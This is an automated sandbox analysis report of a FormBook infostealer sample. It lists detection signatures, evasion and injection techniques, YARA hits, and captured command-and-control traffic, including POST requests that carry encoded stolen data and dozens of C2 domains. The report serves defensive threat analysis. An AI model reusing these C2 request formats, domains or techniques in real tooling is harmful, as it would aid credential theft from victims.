Analysis Report R6o4qCis6s.exe

Overview

General Information

Sample Name: R6o4qCis6s.exe
Analysis ID: 287799
MD5: 79f04bd1fc5f9757f7979bb8cbefdd5e
SHA1: e34056989f520736af44df68d869b71a4d4d695f
SHA256: 8aafecddd3b462d27c24000757496edb5c6bce1e6abff9157d5360457b0805d7
Tags: exe

Most interesting Screenshot:

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected FormBook malware
Detected unpacking (changes PE section rights)
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
Contains functionality to detect sleep reduction / modifications
Creates an undocumented autostart registry key
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect virtualization through RDTSC time measurements
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file access)
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to detect sandboxes (mouse cursor move detection)
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May check if the current machine is a sandbox (GetTickCount - Sleep)
May sleep (evasive loops) to hinder dynamic analysis
PE file contains strange resources
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

AV Detection:

barindex
Antivirus / Scanner detection for submitted sample
Source: R6o4qCis6s.exe Avira: detected
Antivirus detection for URL or domain
Source: http://www.heyidianzib.com/tln/ Avira URL Cloud: Label: malware
Source: http://www.heyidianzib.com Avira URL Cloud: Label: malware
Source: http://www.heyidianzib.com/tln/www.olisolution.com Avira URL Cloud: Label: malware
Multi AV Scanner detection for domain / URL
Source: www.glowtey.com Virustotal: Detection: 7% Perma Link
Source: http://www.glowtey.com/tln/ Virustotal: Detection: 8% Perma Link
Source: http://www.glowtey.com Virustotal: Detection: 7% Perma Link
Multi AV Scanner detection for submitted file
Source: R6o4qCis6s.exe Virustotal: Detection: 77% Perma Link
Source: R6o4qCis6s.exe ReversingLabs: Detection: 79%
Yara detected FormBook
Source: Yara match File source: 00000001.00000002.256707467.0000000000D30000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.480556818.00000000027D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.482583136.00000000045B0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.476122908.0000000000220000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000001.213014038.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.256661656.0000000000D00000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.215688359.0000000004170000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.215724959.00000000041B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.256039719.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0.2.R6o4qCis6s.exe.41b0000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.R6o4qCis6s.exe.4170000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.R6o4qCis6s.exe.41b0000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.1.R6o4qCis6s.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.R6o4qCis6s.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.1.R6o4qCis6s.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.R6o4qCis6s.exe.4170000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.R6o4qCis6s.exe.400000.0.unpack, type: UNPACKEDPE
Machine Learning detection for sample
Source: R6o4qCis6s.exe Joe Sandbox ML: detected
Antivirus or Machine Learning detection for unpacked file
Source: 0.2.R6o4qCis6s.exe.4170000.2.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 0.2.R6o4qCis6s.exe.41b0000.3.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 1.1.R6o4qCis6s.exe.400000.0.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 1.2.R6o4qCis6s.exe.400000.0.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 0_2_00408D20 FindFirstFileA,FindClose,FileTimeToLocalFileTime,FileTimeToDosDateTime, 0_2_00408D20
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 0_2_00405BE0 GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn, 0_2_00405BE0

Networking:

barindex
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic Snort IDS: 1201 ATTACK-RESPONSES 403 Forbidden 34.102.136.180:80 -> 192.168.2.4:49734
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /tln/?TTF=D8Oxqr&jfIlkD=Gih6PLZ1iCkKV6XaU73/B7cCcaHYH4uOLwbm5LWBOFF6YtYGomD/H0QVY53aBPOxn4Dm HTTP/1.1Host: www.cashflowtoday.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /tln/?jfIlkD=aheimOvVxRHS9+ZkV/8M4zSPjXUKcvGCrPlEERzYyjhu9GlhsqSRacAATphOmA3mqti9&TTF=D8Oxqr HTTP/1.1Host: www.themayoparty.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 34.102.136.180 34.102.136.180
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: AMAZON-02US AMAZON-02US
Source: Joe Sandbox View ASN Name: GOOGLEUS GOOGLEUS
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: POST /tln/ HTTP/1.1Host: www.themayoparty.comConnection: closeContent-Length: 412Cache-Control: no-cacheOrigin: http://www.themayoparty.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.themayoparty.com/tln/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 6a 66 49 6c 6b 44 3d 53 44 53 59 34 70 6a 41 33 6a 36 6e 38 70 55 4b 56 5a 31 79 6b 58 61 72 72 6e 38 72 62 76 4b 2d 76 4b 59 47 61 43 48 30 7a 57 56 55 34 55 74 77 39 76 6e 57 63 37 74 6e 43 73 73 52 6b 45 6e 4a 6d 74 4c 4a 6b 64 79 35 72 4a 33 4c 73 6f 39 50 58 34 73 6e 46 67 69 4a 56 6d 4a 6f 73 4c 73 31 4e 36 6e 31 6a 41 48 36 30 47 74 52 6d 46 6f 6b 32 51 75 66 52 53 46 32 42 6b 57 58 76 5f 67 4d 4c 33 57 67 74 67 28 4c 50 6a 77 52 5a 38 30 70 63 69 71 33 70 32 50 34 65 32 62 78 68 43 64 55 32 70 6f 59 48 54 73 5a 5a 4f 6e 70 66 42 7a 67 39 67 76 4a 6e 66 35 68 6f 35 49 65 71 34 72 4f 53 6e 35 77 55 4f 76 79 71 52 38 61 7e 55 76 62 51 4c 67 46 45 74 72 69 6c 41 72 50 4e 74 74 52 38 63 68 34 7a 6e 6f 56 4b 50 46 59 62 37 7e 5a 73 70 6c 71 37 7a 47 5f 33 78 38 6e 76 34 46 33 7e 73 4e 62 62 55 64 66 67 2d 34 44 4c 32 61 4f 6e 69 77 31 36 43 78 66 61 43 73 6f 42 30 30 48 49 4b 65 75 57 5a 61 79 76 46 56 56 6f 67 37 52 69 65 53 70 50 75 5a 52 69 4d 64 78 44 56 33 64 30 31 28 6c 59 6f 70 4d 4a 50 79 54 76 33 71 55 49 59 72 79 28 44 49 6e 34 32 76 57 49 72 39 50 63 44 28 37 43 76 46 51 76 4f 36 32 41 6f 51 58 59 59 62 32 6a 57 5a 4b 6f 76 55 46 63 73 76 74 4b 44 74 6b 65 55 35 46 33 31 6c 33 51 44 38 77 31 51 29 2e 00 00 00 00 00 00 00 00 Data Ascii: jfIlkD=SDSY4pjA3j6n8pUKVZ1ykXarrn8rbvK-vKYGaCH0zWVU4Utw9vnWc7tnCssRkEnJmtLJkdy5rJ3Lso9PX4snFgiJVmJosLs1N6n1jAH60GtRmFok2QufRSF2BkWXv_gML3Wgtg(LPjwRZ80pciq3p2P4e2bxhCdU2poYHTsZZOnpfBzg9gvJnf5ho5Ieq4rOSn5wUOvyqR8a~UvbQLgFEtrilArPNttR8ch4znoVKPFYb7~Zsplq7zG_3x8nv4F3~sNbbUdfg-4DL2aOniw16CxfaCsoB00HIKeuWZayvFVVog7RieSpPuZRiMdxDV3d01(lYopMJPyTv3qUIYry(DIn42vWIr9PcD(7CvFQvO62AoQXYYb2jWZKovUFcsvtKDtkeU5F31l3QD8w1Q).
Source: global traffic HTTP traffic detected: POST /tln/ HTTP/1.1Host: www.themayoparty.comConnection: closeContent-Length: 163864Cache-Control: no-cacheOrigin: http://www.themayoparty.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.themayoparty.com/tln/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 6a 66 49 6c 6b 44 3d 53 44 53 59 34 72 44 2d 34 7a 28 5f 74 73 45 4c 48 35 6c 71 67 54 66 31 76 6e 41 34 5a 39 4c 48 77 4b 31 44 61 47 44 77 7e 7a 4a 4b 79 56 39 77 71 36 4c 64 49 4c 74 67 47 63 73 51 7a 55 6a 66 6c 36 33 42 6b 63 47 48 72 4a 28 49 69 37 30 46 57 6f 73 38 45 42 65 31 52 57 31 34 73 4a 6f 51 4e 5a 4c 39 32 77 44 36 77 32 6c 54 6a 55 34 57 78 56 43 61 4e 52 78 5f 48 6d 57 4f 76 4e 6b 65 4b 58 50 50 71 69 62 4e 43 78 73 4b 57 66 73 56 62 78 37 33 7a 79 6e 5f 52 52 79 31 28 56 4e 51 36 49 6f 6d 49 79 73 65 61 2d 28 67 56 6a 71 64 32 78 72 30 6b 50 6f 53 6f 34 51 67 7e 61 7e 51 57 6d 6c 34 54 5f 7a 55 68 41 6f 4c 79 48 72 44 55 4a 49 34 49 49 6a 4e 73 6b 6d 4b 48 64 49 4c 77 2d 6f 39 77 46 5a 72 46 61 31 55 54 75 61 78 71 36 70 79 6d 6a 61 35 37 53 63 72 68 4c 4d 36 35 76 67 30 44 55 64 30 6d 2d 34 58 44 6d 61 59 31 53 46 33 36 7a 42 32 61 45 73 45 4f 77 45 4b 46 70 71 75 59 63 7e 4a 70 31 46 5a 67 77 4c 74 31 4a 79 67 63 63 45 74 6c 4d 64 70 44 58 50 73 30 31 28 48 59 70 70 71 49 36 61 54 76 6e 4c 4b 50 5f 48 2d 32 6a 49 71 39 6e 66 55 54 73 30 45 63 44 6e 37 44 61 70 71 76 39 71 32 45 39 55 51 59 35 62 32 67 6d 5a 4b 6a 50 56 67 55 50 7e 41 48 6a 67 74 4f 58 41 77 36 41 30 42 66 53 74 65 33 79 39 67 72 6d 53 36 5a 6f 58 48 79 67 30 58 73 64 56 62 78 66 63 6b 51 2d 44 78 75 72 4e 30 4f 79 64 63 43 5f 28 4c 77 55 4d 76 35 35 74 58 28 74 4e 67 55 4d 76 59 68 63 51 6d 7a 4c 57 2d 59 76 6b 4e 72 65 61 4a 49 47 57 48 44 53 58 33 35 2d 46 30 76 74 51 67 42 44 35 4d 4e 4f 77 47 49 79 73 78 53 41 45 73 79 32 7a 39 48 6b 73 4d 34 69 6b 77 7a 70 34 32 32 72 70 61 78 70 33 33 35 70 50 6e 53 70 75 34 6b 59 7e 64 4c 62 74 65 47 73 5a 45 33 49 28 51 54 30 55 4e 4b 66 62 4b 46 48 77 71 36 68 54 6e 48 32 49 6c 4f 6c 50 75 43 72 43 62 48 65 73 67 33 32 7e 74 49 50 54 38 79 53 44 63 52 47 68 55 57 6a 51 76 6e 45 47 61 47 35 50 38 4e 62 42 48 6d 67 52 4c 7a 66 6d 2d 50 44 46 64 62 61 33 6c 7a 4a 6e 4f 43 39 61 48 6f 74 73 49 5a 55 65 31 7a 34 4f 70 37 4c 78 52 63 41 48 4a 45 31 6f 7a 45 39 5a 31 48 72 5a 56 6f 5a 4f 4b 6d 51 59 69 7e 36 31 68 78 5a 67 63 50 4e 4f 42 4b 6d 76 79 73 7a 66 77 43 35 43 79 6f 43 69 73 41 2d 77 57 6d 68 54 49 6a 77 5a 32 49 37 7e 57 43 77 70 51 33 67 68 63 46 49 39 4c 41 5a 56 30 62 61 74 49 48 47 74 64 30 6a 57 6c 5a 66 39 4a 73 43 4d 62 46 46 44 6f 55 67 6b 74 7a 48 6e 4a 42 41 41 6b 44 41 72 59 64 34 57 4d 4c 70 50 67 6a 74 5a 53 39 72 4e 6d 49 58 35 64 56 5a 76 74 55 70 72 58 4e 68 34 51 72 5f 30 4e 72 36 64 55 48 68 65 4a 28 2d 39 6c 74 59 72 6d 77 75 52 38 6f 70 33 56 45 53 75 43 70 2d 30 75 38 66 50 36 47 6a 66 4
Source: global traffic HTTP traffic detected: GET /tln/?TTF=D8Oxqr&jfIlkD=Gih6PLZ1iCkKV6XaU73/B7cCcaHYH4uOLwbm5LWBOFF6YtYGomD/H0QVY53aBPOxn4Dm HTTP/1.1Host: www.cashflowtoday.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /tln/?jfIlkD=aheimOvVxRHS9+ZkV/8M4zSPjXUKcvGCrPlEERzYyjhu9GlhsqSRacAATphOmA3mqti9&TTF=D8Oxqr HTTP/1.1Host: www.themayoparty.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: unknown DNS traffic detected: queries for: www.cashflowtoday.net
Source: unknown HTTP traffic detected: POST /tln/ HTTP/1.1Host: www.themayoparty.comConnection: closeContent-Length: 412Cache-Control: no-cacheOrigin: http://www.themayoparty.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.themayoparty.com/tln/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 6a 66 49 6c 6b 44 3d 53 44 53 59 34 70 6a 41 33 6a 36 6e 38 70 55 4b 56 5a 31 79 6b 58 61 72 72 6e 38 72 62 76 4b 2d 76 4b 59 47 61 43 48 30 7a 57 56 55 34 55 74 77 39 76 6e 57 63 37 74 6e 43 73 73 52 6b 45 6e 4a 6d 74 4c 4a 6b 64 79 35 72 4a 33 4c 73 6f 39 50 58 34 73 6e 46 67 69 4a 56 6d 4a 6f 73 4c 73 31 4e 36 6e 31 6a 41 48 36 30 47 74 52 6d 46 6f 6b 32 51 75 66 52 53 46 32 42 6b 57 58 76 5f 67 4d 4c 33 57 67 74 67 28 4c 50 6a 77 52 5a 38 30 70 63 69 71 33 70 32 50 34 65 32 62 78 68 43 64 55 32 70 6f 59 48 54 73 5a 5a 4f 6e 70 66 42 7a 67 39 67 76 4a 6e 66 35 68 6f 35 49 65 71 34 72 4f 53 6e 35 77 55 4f 76 79 71 52 38 61 7e 55 76 62 51 4c 67 46 45 74 72 69 6c 41 72 50 4e 74 74 52 38 63 68 34 7a 6e 6f 56 4b 50 46 59 62 37 7e 5a 73 70 6c 71 37 7a 47 5f 33 78 38 6e 76 34 46 33 7e 73 4e 62 62 55 64 66 67 2d 34 44 4c 32 61 4f 6e 69 77 31 36 43 78 66 61 43 73 6f 42 30 30 48 49 4b 65 75 57 5a 61 79 76 46 56 56 6f 67 37 52 69 65 53 70 50 75 5a 52 69 4d 64 78 44 56 33 64 30 31 28 6c 59 6f 70 4d 4a 50 79 54 76 33 71 55 49 59 72 79 28 44 49 6e 34 32 76 57 49 72 39 50 63 44 28 37 43 76 46 51 76 4f 36 32 41 6f 51 58 59 59 62 32 6a 57 5a 4b 6f 76 55 46 63 73 76 74 4b 44 74 6b 65 55 35 46 33 31 6c 33 51 44 38 77 31 51 29 2e 00 00 00 00 00 00 00 00 Data Ascii: jfIlkD=SDSY4pjA3j6n8pUKVZ1ykXarrn8rbvK-vKYGaCH0zWVU4Utw9vnWc7tnCssRkEnJmtLJkdy5rJ3Lso9PX4snFgiJVmJosLs1N6n1jAH60GtRmFok2QufRSF2BkWXv_gML3Wgtg(LPjwRZ80pciq3p2P4e2bxhCdU2poYHTsZZOnpfBzg9gvJnf5ho5Ieq4rOSn5wUOvyqR8a~UvbQLgFEtrilArPNttR8ch4znoVKPFYb7~Zsplq7zG_3x8nv4F3~sNbbUdfg-4DL2aOniw16CxfaCsoB00HIKeuWZayvFVVog7RieSpPuZRiMdxDV3d01(lYopMJPyTv3qUIYry(DIn42vWIr9PcD(7CvFQvO62AoQXYYb2jWZKovUFcsvtKDtkeU5F31l3QD8w1Q).
Source: explorer.exe, 00000002.00000000.239748077.000000000B156000.00000002.00000001.sdmp String found in binary or memory: http://fontfabrik.com
Source: explorer.exe, 00000002.00000000.239748077.000000000B156000.00000002.00000001.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: explorer.exe, 00000002.00000000.239748077.000000000B156000.00000002.00000001.sdmp String found in binary or memory: http://www.carterandcone.coml
Source: explorer.exe, 00000002.00000002.494732018.0000000005917000.00000004.00000001.sdmp String found in binary or memory: http://www.cashflowtoday.net
Source: explorer.exe, 00000002.00000002.494732018.0000000005917000.00000004.00000001.sdmp String found in binary or memory: http://www.cashflowtoday.net/tln/
Source: explorer.exe, 00000002.00000002.494732018.0000000005917000.00000004.00000001.sdmp String found in binary or memory: http://www.cashflowtoday.net/tln/www.themayoparty.com
Source: explorer.exe, 00000002.00000002.494732018.0000000005917000.00000004.00000001.sdmp String found in binary or memory: http://www.cashflowtoday.netReferer:
Source: explorer.exe, 00000002.00000002.494732018.0000000005917000.00000004.00000001.sdmp String found in binary or memory: http://www.creditcommoncents.com
Source: explorer.exe, 00000002.00000002.494732018.0000000005917000.00000004.00000001.sdmp String found in binary or memory: http://www.creditcommoncents.com/tln/
Source: explorer.exe, 00000002.00000002.494732018.0000000005917000.00000004.00000001.sdmp String found in binary or memory: http://www.creditcommoncents.com/tln/www.daddaenterprises.com
Source: explorer.exe, 00000002.00000002.494732018.0000000005917000.00000004.00000001.sdmp String found in binary or memory: http://www.creditcommoncents.comReferer:
Source: explorer.exe, 00000002.00000002.494732018.0000000005917000.00000004.00000001.sdmp String found in binary or memory: http://www.daddaenterprises.com
Source: explorer.exe, 00000002.00000002.494732018.0000000005917000.00000004.00000001.sdmp String found in binary or memory: http://www.daddaenterprises.com/tln/
Source: explorer.exe, 00000002.00000002.494732018.0000000005917000.00000004.00000001.sdmp String found in binary or memory: http://www.daddaenterprises.com/tln/www.keytoblogging.com
Source: explorer.exe, 00000002.00000002.494732018.0000000005917000.00000004.00000001.sdmp String found in binary or memory: http://www.daddaenterprises.comReferer:
Source: explorer.exe, 00000002.00000002.494732018.0000000005917000.00000004.00000001.sdmp String found in binary or memory: http://www.ero-special.net
Source: explorer.exe, 00000002.00000002.494732018.0000000005917000.00000004.00000001.sdmp String found in binary or memory: http://www.ero-special.net/tln/
Source: explorer.exe, 00000002.00000002.494732018.0000000005917000.00000004.00000001.sdmp String found in binary or memory: http://www.ero-special.net/tln/www.kjvrvg.com
Source: explorer.exe, 00000002.00000002.494732018.0000000005917000.00000004.00000001.sdmp String found in binary or memory: http://www.ero-special.netReferer:
Source: explorer.exe, 00000002.00000000.239748077.000000000B156000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com
Source: explorer.exe, 00000002.00000000.239748077.000000000B156000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers
Source: explorer.exe, 00000002.00000000.239748077.000000000B156000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers/?
Source: explorer.exe, 00000002.00000000.239748077.000000000B156000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: explorer.exe, 00000002.00000000.239748077.000000000B156000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
Source: explorer.exe, 00000002.00000000.239748077.000000000B156000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers8
Source: explorer.exe, 00000002.00000000.239748077.000000000B156000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers?
Source: explorer.exe, 00000002.00000000.239748077.000000000B156000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designersG
Source: explorer.exe, 00000002.00000000.239748077.000000000B156000.00000002.00000001.sdmp String found in binary or memory: http://www.fonts.com
Source: explorer.exe, 00000002.00000000.239748077.000000000B156000.00000002.00000001.sdmp String found in binary or memory: http://www.founder.com.cn/cn
Source: explorer.exe, 00000002.00000000.239748077.000000000B156000.00000002.00000001.sdmp String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: explorer.exe, 00000002.00000000.239748077.000000000B156000.00000002.00000001.sdmp String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: explorer.exe, 00000002.00000000.239748077.000000000B156000.00000002.00000001.sdmp String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: explorer.exe, 00000002.00000000.239748077.000000000B156000.00000002.00000001.sdmp String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: explorer.exe, 00000002.00000002.494732018.0000000005917000.00000004.00000001.sdmp String found in binary or memory: http://www.glowtey.com
Source: explorer.exe, 00000002.00000002.494732018.0000000005917000.00000004.00000001.sdmp String found in binary or memory: http://www.glowtey.com/tln/
Source: explorer.exe, 00000002.00000002.494732018.0000000005917000.00000004.00000001.sdmp String found in binary or memory: http://www.glowtey.com/tln/www.proseo.digital
Source: explorer.exe, 00000002.00000002.494732018.0000000005917000.00000004.00000001.sdmp String found in binary or memory: http://www.glowtey.comReferer:
Source: explorer.exe, 00000002.00000000.239748077.000000000B156000.00000002.00000001.sdmp String found in binary or memory: http://www.goodfont.co.kr
Source: explorer.exe, 00000002.00000002.494732018.0000000005917000.00000004.00000001.sdmp String found in binary or memory: http://www.heyidianzib.com
Source: explorer.exe, 00000002.00000002.494732018.0000000005917000.00000004.00000001.sdmp String found in binary or memory: http://www.heyidianzib.com/tln/
Source: explorer.exe, 00000002.00000002.494732018.0000000005917000.00000004.00000001.sdmp String found in binary or memory: http://www.heyidianzib.com/tln/www.olisolution.com
Source: explorer.exe, 00000002.00000002.494732018.0000000005917000.00000004.00000001.sdmp String found in binary or memory: http://www.heyidianzib.comReferer:
Source: explorer.exe, 00000002.00000002.494732018.0000000005917000.00000004.00000001.sdmp String found in binary or memory: http://www.jgdesignco.com
Source: explorer.exe, 00000002.00000002.494732018.0000000005917000.00000004.00000001.sdmp String found in binary or memory: http://www.jgdesignco.com/tln/
Source: explorer.exe, 00000002.00000002.494732018.0000000005917000.00000004.00000001.sdmp String found in binary or memory: http://www.jgdesignco.com/tln/www.heyidianzib.com
Source: explorer.exe, 00000002.00000002.494732018.0000000005917000.00000004.00000001.sdmp String found in binary or memory: http://www.jgdesignco.comReferer:
Source: explorer.exe, 00000002.00000000.239748077.000000000B156000.00000002.00000001.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: explorer.exe, 00000002.00000002.494732018.0000000005917000.00000004.00000001.sdmp String found in binary or memory: http://www.keytoblogging.com
Source: explorer.exe, 00000002.00000002.494732018.0000000005917000.00000004.00000001.sdmp String found in binary or memory: http://www.keytoblogging.com/tln/
Source: explorer.exe, 00000002.00000002.494732018.0000000005917000.00000004.00000001.sdmp String found in binary or memory: http://www.keytoblogging.com/tln/www.montieri.net
Source: explorer.exe, 00000002.00000002.494732018.0000000005917000.00000004.00000001.sdmp String found in binary or memory: http://www.keytoblogging.comReferer:
Source: explorer.exe, 00000002.00000002.494732018.0000000005917000.00000004.00000001.sdmp String found in binary or memory: http://www.kjvrvg.com
Source: explorer.exe, 00000002.00000002.494732018.0000000005917000.00000004.00000001.sdmp String found in binary or memory: http://www.kjvrvg.com/tln/
Source: explorer.exe, 00000002.00000002.494732018.0000000005917000.00000004.00000001.sdmp String found in binary or memory: http://www.kjvrvg.com/tln/www.jgdesignco.com
Source: explorer.exe, 00000002.00000002.494732018.0000000005917000.00000004.00000001.sdmp String found in binary or memory: http://www.kjvrvg.comReferer:
Source: explorer.exe, 00000002.00000002.494732018.0000000005917000.00000004.00000001.sdmp String found in binary or memory: http://www.laesses.com
Source: explorer.exe, 00000002.00000002.494732018.0000000005917000.00000004.00000001.sdmp String found in binary or memory: http://www.laesses.com/tln/
Source: explorer.exe, 00000002.00000002.494732018.0000000005917000.00000004.00000001.sdmp String found in binary or memory: http://www.laesses.com/tln/www.creditcommoncents.com
Source: explorer.exe, 00000002.00000002.494732018.0000000005917000.00000004.00000001.sdmp String found in binary or memory: http://www.laesses.comReferer:
Source: explorer.exe, 00000002.00000002.494732018.0000000005917000.00000004.00000001.sdmp String found in binary or memory: http://www.montieri.net
Source: explorer.exe, 00000002.00000002.494732018.0000000005917000.00000004.00000001.sdmp String found in binary or memory: http://www.montieri.net/tln/
Source: explorer.exe, 00000002.00000002.494732018.0000000005917000.00000004.00000001.sdmp String found in binary or memory: http://www.montieri.net/tln/v
Source: explorer.exe, 00000002.00000002.494732018.0000000005917000.00000004.00000001.sdmp String found in binary or memory: http://www.montieri.netReferer:
Source: explorer.exe, 00000002.00000002.494732018.0000000005917000.00000004.00000001.sdmp String found in binary or memory: http://www.olisolution.com
Source: explorer.exe, 00000002.00000002.494732018.0000000005917000.00000004.00000001.sdmp String found in binary or memory: http://www.olisolution.com/tln/
Source: explorer.exe, 00000002.00000002.494732018.0000000005917000.00000004.00000001.sdmp String found in binary or memory: http://www.olisolution.com/tln/www.onthejoblanguages.com
Source: explorer.exe, 00000002.00000002.494732018.0000000005917000.00000004.00000001.sdmp String found in binary or memory: http://www.olisolution.comReferer:
Source: explorer.exe, 00000002.00000002.494732018.0000000005917000.00000004.00000001.sdmp String found in binary or memory: http://www.onthejoblanguages.com
Source: explorer.exe, 00000002.00000002.494732018.0000000005917000.00000004.00000001.sdmp String found in binary or memory: http://www.onthejoblanguages.com/tln/
Source: explorer.exe, 00000002.00000002.494732018.0000000005917000.00000004.00000001.sdmp String found in binary or memory: http://www.onthejoblanguages.com/tln/www.laesses.com
Source: explorer.exe, 00000002.00000002.494732018.0000000005917000.00000004.00000001.sdmp String found in binary or memory: http://www.onthejoblanguages.comReferer:
Source: explorer.exe, 00000002.00000002.494732018.0000000005917000.00000004.00000001.sdmp String found in binary or memory: http://www.proseo.digital
Source: explorer.exe, 00000002.00000002.494732018.0000000005917000.00000004.00000001.sdmp String found in binary or memory: http://www.proseo.digital/tln/
Source: explorer.exe, 00000002.00000002.494732018.0000000005917000.00000004.00000001.sdmp String found in binary or memory: http://www.proseo.digital/tln/www.saliwasims.com
Source: explorer.exe, 00000002.00000002.494732018.0000000005917000.00000004.00000001.sdmp String found in binary or memory: http://www.proseo.digitalReferer:
Source: explorer.exe, 00000002.00000000.239748077.000000000B156000.00000002.00000001.sdmp String found in binary or memory: http://www.sajatypeworks.com
Source: explorer.exe, 00000002.00000000.239748077.000000000B156000.00000002.00000001.sdmp String found in binary or memory: http://www.sakkal.com
Source: explorer.exe, 00000002.00000002.494732018.0000000005917000.00000004.00000001.sdmp String found in binary or memory: http://www.saliwasims.com
Source: explorer.exe, 00000002.00000002.494732018.0000000005917000.00000004.00000001.sdmp String found in binary or memory: http://www.saliwasims.com/tln/
Source: explorer.exe, 00000002.00000002.494732018.0000000005917000.00000004.00000001.sdmp String found in binary or memory: http://www.saliwasims.com/tln/www.ero-special.net
Source: explorer.exe, 00000002.00000002.494732018.0000000005917000.00000004.00000001.sdmp String found in binary or memory: http://www.saliwasims.comReferer:
Source: explorer.exe, 00000002.00000000.239748077.000000000B156000.00000002.00000001.sdmp String found in binary or memory: http://www.sandoll.co.kr
Source: explorer.exe, 00000002.00000002.494732018.0000000005917000.00000004.00000001.sdmp, explorer.exe, 00000005.00000002.484794744.0000000004EA9000.00000004.00000001.sdmp String found in binary or memory: http://www.themayoparty.com
Source: explorer.exe, 00000002.00000002.494732018.0000000005917000.00000004.00000001.sdmp, explorer.exe, 00000005.00000002.484794744.0000000004EA9000.00000004.00000001.sdmp String found in binary or memory: http://www.themayoparty.com/tln/
